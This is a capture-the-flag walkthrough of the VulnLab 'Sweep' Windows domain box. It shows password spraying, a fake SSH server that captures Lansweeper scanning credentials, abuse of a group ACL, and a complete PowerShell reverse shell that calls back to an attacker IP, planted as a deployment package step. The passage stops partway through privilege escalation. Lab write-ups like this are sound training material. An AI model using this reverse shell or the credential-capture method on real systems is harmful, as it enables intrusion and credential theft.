POSTS

VULNLAB: Sweep

Sweep is a medium difficulty Windows box that involves Active Directory and Lansweeper, a technology asset intelligence tool. The attacker abuses an enabled guest account to gain access to Lansweeper, which has Map Credentials configured, which are login/password combinations for accessing and scanning network assets remotely. The attacker deploys a honeypot SSH server to read the configured credentials. The compromised account is a member of the Lansweeper Discovery group, which has GenericAll ACL over the Lansweeper Admins group. Any account member of the Lansweeper Admins group has administrator privileges on the Lansweeper dashboard. The attacker creates and deploys a package on the Domain Controller to gain complete control.

VULNLAB: Sweep
4172 words · 20 min

Overview

  • Type Machines
  • OS Windows
  • Severity Medium
  • Creator Yeeb
  • Release date 2024 Mar 1

Enumeration

Start the instance via Discord, wait around 5 minutes for the machine to start all services and let’s go:

image

10.10.115.23

Nmap

$ nmap -sC -sV -Pn -p- --min-rate=1000 -T4 10.10.115.23
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-25 15:05 JST
Nmap scan report for 10.10.115.23
Host is up (0.24s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
81/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
82/tcp    open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=Lansweeper Secure Website
| Subject Alternative Name: DNS:localhost, DNS:localhost, DNS:localhost
| Not valid before: 2021-11-21T09:22:27
|_Not valid after:  2121-12-21T09:22:27
| tls-alpn: 
|_  http/1.1
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-25 06:07:25Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-01-25T06:08:58+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=inventory.sweep.vl
| Not valid before: 2025-01-24T05:52:44
|_Not valid after:  2025-07-26T05:52:44
| rdp-ntlm-info: 
|   Target_Name: SWEEP
|   NetBIOS_Domain_Name: SWEEP
|   NetBIOS_Computer_Name: INVENTORY
|   DNS_Domain_Name: sweep.vl
|   DNS_Computer_Name: inventory.sweep.vl
|   DNS_Tree_Name: sweep.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-01-25T06:08:17+00:00
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49684/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows
  • Found a windows server in the domain sweep.vl (seems a DC as Kerberos 88/tcp is open).
  • Main open ports are for HTTP server, DNS, LDAP, SMB and also RDP, WinRM.
  • Seems special ports (not common) are open too: 81/tcp. 82/tcp related to Lansweeper, an IT Asset Management platform.
  • Add inventory.sweep.vl, sweep.vl in in /etc/hosts

SMB Shared folder (445/tcp)

List shared folders using the guest account:

$ nxc smb inventory.sweep.vl -u 'guest' -p '' --shares
SMB         10.10.115.23    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.115.23    445    INVENTORY        [+] sweep.vl\guest: 
SMB         10.10.115.23    445    INVENTORY        [*] Enumerated shares
SMB         10.10.115.23    445    INVENTORY        Share           Permissions     Remark
SMB         10.10.115.23    445    INVENTORY        -----           -----------     ------
SMB         10.10.115.23    445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.115.23    445    INVENTORY        C$                              Default share
SMB         10.10.115.23    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.115.23    445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.115.23    445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.115.23    445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.115.23    445    INVENTORY        SYSVOL                          Logon server share 

Found:

  • DefaultPackageShare$ with read only access
  • The server is Windows Server 2022 so pretty new with a build 20348

Quick overview and grab some files:

$ smbclientng -u 'guest' -p '' --host inventory.sweep.vl
               _          _ _            _                    
 ___ _ __ ___ | |__   ___| (_) ___ _ __ | |_      _ __   __ _ 
/ __| '_ ` _ \| '_ \ / __| | |/ _ \ '_ \| __|____| '_ \ / _` |
\__ \ | | | | | |_) | (__| | |  __/ | | | ||_____| | | | (_| |
|___/_| |_| |_|_.__/ \___|_|_|\___|_| |_|\__|    |_| |_|\__, |
    by @podalirius_                             v2.1.7  |___/  
    
[+] Successfully authenticated to 'inventory.sweep.vl' as '.\guest'!
■[\\inventory.sweep.vl\]> use DefaultPackageShare$
■[\\inventory.sweep.vl\DefaultPackageShare$\]> acls
d-------     0.00 B  2024-02-09 04:46  .\
d-------     0.00 B  2024-02-09 04:47  ..\
d-------     0.00 B  2024-02-09 04:46  Images\
             Owner:   BUILTIN\Administrators
             Group:   SWEEP\Domain Users
             Allowed: Everyone                                                          READ_CONTROL | SYNCHRONIZE
             Allowed: Everyone                                                          READ_CONTROL | SYNCHRONIZE
             Allowed: NT SERVICE\TrustedInstaller                                       WRITE_OWNER | WRITE_DACL | DELETE | READ_CONTROL | SYNCHRONIZE
             Allowed: NT SERVICE\TrustedInstaller                                       GENERIC_ALL
             Allowed: BUILTIN\Users                                                     READ_CONTROL | SYNCHRONIZE
             Allowed: BUILTIN\Users                                                     GENERIC_READ | GENERIC_EXECUTE
             Allowed: CREATOR OWNER                                                     GENERIC_ALL
             Allowed: APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES            READ_CONTROL | SYNCHRONIZE
             Allowed: APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES            GENERIC_READ | GENERIC_EXECUTE
             Allowed: APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES READ_CONTROL | SYNCHRONIZE
             Allowed: APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES GENERIC_READ | GENERIC_EXECUTE

d-------     0.00 B  2024-02-09 04:46  Installers\
             Owner:   BUILTIN\Administrators
             Group:   SWEEP\Domain Users
             Allowed: Everyone                                                          READ_CONTROL | SYNCHRONIZE
             Allowed: Everyone                                                          READ_CONTROL | SYNCHRONIZE
             Allowed: NT SERVICE\TrustedInstaller                                       WRITE_OWNER | WRITE_DACL | DELETE | READ_CONTROL | SYNCHRONIZE
             Allowed: NT SERVICE\TrustedInstaller                                       GENERIC_ALL
             Allowed: BUILTIN\Users                                                     READ_CONTROL | SYNCHRONIZE
             Allowed: BUILTIN\Users                                                     GENERIC_READ | GENERIC_EXECUTE
             Allowed: CREATOR OWNER                                                     GENERIC_ALL
             Allowed: APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES            READ_CONTROL | SYNCHRONIZE
             Allowed: APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES            GENERIC_READ | GENERIC_EXECUTE
             Allowed: APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES READ_CONTROL | SYNCHRONIZE
             Allowed: APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES GENERIC_READ | GENERIC_EXECUTE

d-------     0.00 B  2024-02-09 04:46  Scripts\
             Owner:   BUILTIN\Administrators
             Group:   SWEEP\Domain Users
             Allowed: Everyone                                                          READ_CONTROL | SYNCHRONIZE
             Allowed: Everyone                                                          READ_CONTROL | SYNCHRONIZE
             Allowed: NT SERVICE\TrustedInstaller                                       WRITE_OWNER | WRITE_DACL | DELETE | READ_CONTROL | SYNCHRONIZE
             Allowed: NT SERVICE\TrustedInstaller                                       GENERIC_ALL
             Allowed: BUILTIN\Users                                                     READ_CONTROL | SYNCHRONIZE
             Allowed: BUILTIN\Users                                                     GENERIC_READ | GENERIC_EXECUTE
             Allowed: CREATOR OWNER                                                     GENERIC_ALL
             Allowed: APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES            READ_CONTROL | SYNCHRONIZE
             Allowed: APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES            GENERIC_READ | GENERIC_EXECUTE
             Allowed: APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES READ_CONTROL | SYNCHRONIZE
             Allowed: APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES GENERIC_READ | GENERIC_EXECUTE

■[\\inventory.sweep.vl\DefaultPackageShare$\]> tree
├── Images/
│   └── WindowsLS.jpg
├── Installers/
└── Scripts/
    ├── CmpDesc.vbs
    ├── CopyFile.vbs
    └── Wallpaper.vbs
■[\\inventory.sweep.vl\DefaultPackageShare$\]> cd Scripts
■[\\inventory.sweep.vl\DefaultPackageShare$\Scripts\]> get *
'CmpDesc.vbs' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.1/1.1 kB • ? • 0:00:00
'CopyFile.vbs' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 728/728 bytes • ? • 0:00:00
'Wallpaper.vbs' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.2/1.2 kB • ? • 0:00:00
■[\\inventory.sweep.vl\DefaultPackageShare$\Scripts\]> cd ..
■[\\inventory.sweep.vl\DefaultPackageShare$\]> cd Images
■[\\inventory.sweep.vl\DefaultPackageShare$\Images\]> get *
'WindowsLS.jpg' ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 132.4/132.4 kB • ? • 0:00:00
■[\\inventory.sweep.vl\DefaultPackageShare$\Images\]> exit

Quick check of downloaded files:

  • Image:

image

  • VB Scripts:
$ cat CmpDesc.vbs
               
Dim  reg, objRegistry
Dim SN, M, ValueName, strComputer
Const HKLM = &H80000002
strComputer = "."

Set reg = GetObject("winmgmts:\\" & strComputer & "\root\default:StdRegProv")

on error resume next
If WScript.Arguments.count = 0 Then

	Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2").ExecQuery("Select * FROM 	Win32_OperatingSystem")
	For Each object In objRegistry
		SN = object.SerialNumber 
	Next 

	Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2").ExecQuery("Select * FROM 	Win32_ComputerSystem")
	For Each object In objRegistry
		M = object.Model
	Next 

	value = M & ": " & SN
	key = "SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
	ValueName = "srvcomment"

	If Len(value) > 48 Then value = Left(value, 48)
	reg.SetStringValue HKLM, key, ValueName, value
Else
	value = WScript.Arguments(0)
	key = "SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
	ValueName = "srvcomment"
	reg.SetStringValue HKLM, key, ValueName, value
End if
$ cat CopyFile.vbs 

'this script takes 2 arguments => "Source" and "Destination" and uses this to copy a the file
Source = WScript.Arguments.Item(0)
Destination = WScript.Arguments.Item(1)

Set fso = CreateObject("Scripting.FileSystemObject")
'Check to see if the file already exists in the destination folder
If fso.FileExists(Destination) Then
	'Check to see if the file is read-only
	If Not fso.GetFile(Destination).Attributes And 1 Then 
			fso.CopyFile Source, Destination, True
	Else 
		'The file exists and is read-only.
		fso.GetFile(Destination).Attributes = fso.GetFile(Destination).Attributes - 1
			fso.CopyFile Source, Destination, True
	End If
Else
		fso.CopyFile Source, Destination, True
End If
Set fso = Nothing
$ cat Wallpaper.vbs 

'this script takes 2 arguments ("Source a Destination") 
Source = WScript.Arguments.Item(0)
Destination = WScript.Arguments.Item(1)

Const HKEY_LOCAL_MACHINE = &H80000001
strComputer = "."
Set StdOut = WScript.StdOut
Set oShell = Wscript.CreateObject("WScript.Shell")
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")


Set fso = CreateObject("Scripting.FileSystemObject")
'Check to see if the file already exists in the destination folder
If fso.FileExists(Destination) Then
	'Check to see if the file is read-only
	If Not fso.GetFile(Destination).Attributes And 1 Then 
			fso.CopyFile Source, Destination, True
	Else 
		'The file exists and is read-only.
		fso.GetFile(Destination).Attributes = fso.GetFile(Destination).Attributes - 1
			fso.CopyFile Source, Destination, True
	End If
Else
		fso.CopyFile Source, Destination, True
End If
Set fso = Nothing

strKeyPath = "Control Panel\Desktop"
strValueName = "WallPaper"
strValue = Destination
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue

RegCommandValue = "RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True"
ReturnVal = oShell.Run (RegCommandValue, 1, True)

Nothing is really interesting/helpfull at this moment.

RID Brute-forcing

As we are able to read IPC$ so we can proceed to RID brute-force attack to enumerate all domain users:

$ nxc smb inventory.sweep.vl -u 'guest' -p '' --rid-brute 10000
SMB         10.10.115.23    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.115.23    445    INVENTORY        [+] sweep.vl\guest: 
SMB         10.10.115.23    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.115.23    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.115.23    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.115.23    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.115.23    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.115.23    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.115.23    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.115.23    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

Let’s copy/paste the output to a file then get just the users and put them in a new wordlist file:

$ cat all_sids.txt | grep TypeUser | awk '{ print $6}' | cut -d '\' -f 2 > all_users.txt 
$ cat all_users.txt                                                                      
Administrator
Guest
krbtgt
INVENTORY$
jgre808
bcla614
hmar648
jgar931
fcla801
jwil197
grob171
fdav736
jsmi791
hjoh690
svc_inventory_win
svc_inventory_lnx
intern

Password Spray attacking

Let’s go for username spray attack with an empty password:

$ nxc smb inventory.sweep.vl -u all_users.txt -p '' --continue-on-success 
SMB         10.10.115.23    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\Administrator: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\krbtgt: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\INVENTORY$: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\jgre808: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\bcla614: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\hmar648: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\jgar931: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\fcla801: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\jwil197: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\grob171: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\fdav736: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\jsmi791: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\hjoh690: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\svc_inventory_win: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\svc_inventory_lnx: STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\intern: STATUS_LOGON_FAILURE 

No user has his passwords reset.

Do it again to check if any user has the same password as username:

$ nxc smb inventory.sweep.vl -u all_users.txt -p all_users.txt --continue-on-success 
SMB         10.10.115.23    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\Administrator:Administrator STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\Guest:Administrator STATUS_LOGON_FAILURE 
...
SMB         10.10.115.23    445    INVENTORY        [-] sweep.vl\svc_inventory_lnx:intern STATUS_LOGON_FAILURE 
SMB         10.10.115.23    445    INVENTORY        [+] sweep.vl\intern:intern 

Found intern:intern

Proceed to a new SMB share enumeration using these new credentials:

$ nxc smb inventory.sweep.vl -u intern -p intern --shares              
SMB         10.10.115.23    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.115.23    445    INVENTORY        [+] sweep.vl\intern:intern 
SMB         10.10.115.23    445    INVENTORY        [*] Enumerated shares
SMB         10.10.115.23    445    INVENTORY        Share           Permissions     Remark
SMB         10.10.115.23    445    INVENTORY        -----           -----------     ------
SMB         10.10.115.23    445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.115.23    445    INVENTORY        C$                              Default share
SMB         10.10.115.23    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.115.23    445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.115.23    445    INVENTORY        Lansweeper$     READ            Lansweeper Actions
SMB         10.10.115.23    445    INVENTORY        NETLOGON        READ            Logon server share 
SMB         10.10.115.23    445    INVENTORY        SYSVOL          READ            Logon server share 

We can READ access to Lansweeper$

Dig into it:

$ smbclientng -u intern -p intern --host inventory.sweep.vl
               _          _ _            _                    
 ___ _ __ ___ | |__   ___| (_) ___ _ __ | |_      _ __   __ _ 
/ __| '_ ` _ \| '_ \ / __| | |/ _ \ '_ \| __|____| '_ \ / _` |
\__ \ | | | | | |_) | (__| | |  __/ | | | ||_____| | | | (_| |
|___/_| |_| |_|_.__/ \___|_|_|\___|_| |_|\__|    |_| |_|\__, |
    by @podalirius_                             v2.1.7  |___/  
    
[+] Successfully authenticated to 'inventory.sweep.vl' as '.\intern'!
■[\\inventory.sweep.vl\]> use Lansweeper$
■[\\inventory.sweep.vl\Lansweeper$\]> tree
├── changeallowed.vbs
├── changepassword.vbs
├── CookComputing.XmlRpcV2.dll
├── Devicetester.exe
├── Heijden.Dns.dll
├── mustchangepassword.vbs
├── putty.exe
├── shellexec.vbs
├── SMBLibrary.dll
├── testconnection.exe
├── unlock.vbs
├── Utilities.dll
├── vimservice25.dll
├── vimservice25.xmlserializers.dll
├── vimservice40.dll
├── vimservice40.xmlserializers.dll
├── vimservice41.dll
├── vimservice41.xmlserializers.dll
├── vimservice50.dll
├── vimservice50.xmlserializers.dll
├── vimservice51.dll
├── vimservice51.xmlserializers.dll
├── vimservice55.dll
├── vimservice55.xmlserializers.dll
├── vmware.vim.dll
├── wol.exe
└── XenServer.dll
■[\\inventory.sweep.vl\Lansweeper$\]> cat changepassword.vbs
If WScript.Arguments.Count = 1 Then
	Dim password1,password2

	password1=InputBox("Enter new password(1):")

	if IsEmpty(password1) then
		
		WScript.Quit

	end if

	password2=InputBox("Enter new password(2):")

	if IsEmpty(password2) then
		
		WScript.Quit
	end if

	if password1 <> "" then
	   if password1=password2 then
		struser= WScript.Arguments(0)
		Set objUser = GetObject("LDAP://" & struser)
		objUser.SetPassword(password1)
		msgbox "Password changed"
	   else
		msgbox "Passwords do not match"
	   end if
	else
		msgbox "Password cannot be blank"
	end if
end if
■[\\inventory.sweep.vl\Lansweeper$\]> cat mustchangepassword.vbs
If WScript.Arguments.Count = 1 Then
		struser= WScript.Arguments(0)
		Set objUser = GetObject("LDAP://" & struser)
		objUser.Put "pwdLastSet", 0
		objUser.SetInfo
		msgbox "User Must Change Password at Next Logon"
end if
■[\\inventory.sweep.vl\Lansweeper$\]> cat shellexec.vbs
Set objShell = CreateObject("Shell.Application")
objShell.ShellExecute WScript.Arguments(0), "", "", "", 1
...
■[\\inventory.sweep.vl\Lansweeper$\]> exit

Not really interesting

BloodHound

Let’s go to enumerate the Active Directory then ingest to BloodHound Community Edition for analysis:

$ nxc ldap inventory.sweep.vl -d sweep.vl -u 'intern' -p 'intern' --bloodhound --dns-server 10.10.115.23 --dns-tcp --dns-timeout 10 --collection All,LoggedOn
SMB         10.10.115.23    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
LDAP        10.10.115.23    389    INVENTORY        [+] sweep.vl\intern:intern 
LDAP        10.10.115.23    389    INVENTORY        Resolved collection methods: container, loggedon, acl, rdp, localadmin, group, session, trusts, objectprops, dcom, psremote
LDAP        10.10.115.23    389    INVENTORY        Done in 00M 53S
LDAP        10.10.115.23    389    INVENTORY        Compressing output into /home/user/.nxc/logs/INVENTORY_10.10.115.23_2025-01-25_170805_bloodhound.zip

image

SVC_INVENTORY_WIN is a member of ADMINISTRATORS group

image

Found an interesting attack path if we can pwned SVC_INVENTORY_WIN:

  • Member of LANSWEEPER DISCOVERY group, so maybe he can be used to scan asset in the Lansweeper portal
  • Has GenericAll privilege to the LANSWEEPER ADMINS group, so if we can add it into this group then we become a member of the REMOTE MANAGEMENT USERS group, so can connect to the DC via RDP or WinRM.

Lansweeper

We can see on the port 81/tcp (with HTTP) that we access to a login page of Lansweeper portal:

image

Using intern:intern then click on WINDOWS LOGIN we can login:

image

image

We can see also that we have the same access on port 82/tcp with HTTPS:

image

After a brief enumeration, we found some saved credentials in Scanning > Scanning credentials:

image

2 accounts seem interesting:

  • svc_inventory_lnx
  • svc_inventory_win

The user svc_inventory_lnx has the ability to scan the targets and his credentials.

If we configure a sniffer on our attacker machine then use it to scan our machine, we should be able to capture the plain text credentials.

Let’s do it.

SSH Credential Sniffing (svc_inventory_lnx) (Sweep_User)

We use fffaraz’s fakessh to set a fake SSH server on our attacker machine:

$ go install github.com/fffaraz/fakessh@latest
$ sudo setcap 'cap_net_bind_service=+ep' ~/go/bin/fakessh
$ ~/go/bin/fakessh 

OR we can use also sshesame, an SSH honeypot. Just don’t forget to change the listener to 0.0.0.0:22 in the sshesame.yaml file.

In Scanning targets, we click on Add Scanning Target then fill as below (uncheck all days and check Enable this scanning target):

image

In the Scanning > Scanning credentials > Credential Mapping section we click + Credential in our IP Range row, then select Inventory Linux:

image

We can see the status of svc_inventory_lnx has changed as now it is mapped:

image

We return to Scanning targets then we click on Scan now for the row where our attacker machine is assigned:

image

Then we got a call and the password of svc_inventory_lnx:

$ ~/go/bin/fakessh 
2025/01/25 16:48:23.169250 10.10.115.23:54787
2025/01/25 16:48:30.071654 10.10.115.23:54802
2025/01/25 16:48:30.986233 10.10.115.23:54804
2025/01/25 16:48:31.954882 10.10.115.23:54804 SSH-2.0-RebexSSH_5.0.8372.0 svc_inventory_lnx 0|5m-U6?/uAX

Found svc_inventory_lnx:0|5m-U6?/uAX

Add our user to the LANSWEEPER ADMINS group abusing the Generic All privilege:

$ bloodyAD --host inventory.sweep.vl -u svc_inventory_lnx -p '0|5m-U6?/uAX' -d sweep.vl add groupMember 'LANSWEEPER ADMINS' svc_inventory_lnx
[+] svc_inventory_lnx added to LANSWEEPER ADMINS

Then we can connect to the DC via WinRM and grab the flag Sweep_User:

$ evil-winrm -i inventory.sweep.vl -u svc_inventory_lnx -p '0|5m-U6?/uAX'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          2/8/2024  11:50 AM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         2/11/2024   1:30 AM                Program Files
d-----          2/8/2024  12:17 PM                Program Files (x86)
d-r---         1/25/2025  12:26 AM                Users
d-----         2/11/2024   1:43 AM                Windows
-a----          2/8/2024  12:43 PM             36 user.txt


*Evil-WinRM* PS C:\> type user.txt
VL{d0f2522312ba549fd2daca09e293bfd1}

Privilege Escalation

Deployment package exploiting

We logout and login again to the Lansweeper portal using the svc_inventory’s credentials:

image

We can see that we have more privileges:

image

image

image

We can access to Access Deployment

In Deployment > Deployment packages, click on + New package:

image

Click on + Add step:

image

We put our reverse shell (from https://www.revshells.com/ we choose PowerShell #2):

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.8.4.253',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

image

image

We need now to create a new credential mapping to assign to this new deployment package.

In the Scanning > Scanning credentials > Credential Mapping section we click + Credential and fill/select as bellow:

  • Mapping type: Windows Computer
  • Domain\Computername: sweep\inventory
  • Select Inventory Windows

image

We can see the status of svc_inventory_win has changed as now it is mapped:

image

